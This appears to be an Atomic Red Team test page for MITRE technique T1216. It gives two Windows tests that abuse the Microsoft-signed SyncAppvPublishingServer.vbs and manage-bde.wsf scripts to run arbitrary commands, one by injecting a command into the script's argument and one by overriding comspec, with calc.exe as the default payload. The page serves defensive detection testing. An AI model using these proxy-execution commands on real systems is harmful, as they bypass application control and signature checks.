Skip to content

Latest commit

 

History

History
75 lines (38 loc) · 2.08 KB

T1216.md

File metadata and controls

75 lines (38 loc) · 2.08 KB

T1216 - Signed Script Proxy Execution

Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)

Atomic Tests


Atomic Test #1 - SyncAppvPublishingServer Signed Script PowerShell Command Execution

Executes the signed SyncAppvPublishingServer script with options to execute an arbitrary PowerShell command. Upon execution, calc.exe will be launched.

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
command_to_execute A PowerShell command to execute. string Start-Process calc

Attack Commands: Run with command_prompt!

C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"


Atomic Test #2 - manage-bde.wsf Signed Script Command Execution

Executes the signed manage-bde.wsf script with options to execute an arbitrary command.

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
command_to_execute A command to execute. Path %windir%\System32\calc.exe

Attack Commands: Run with command_prompt!

set comspec=#{command_to_execute}
cscript %windir%\System32\manage-bde.wsf

Cleanup Commands:

set comspec=%windir%\System32\cmd.exe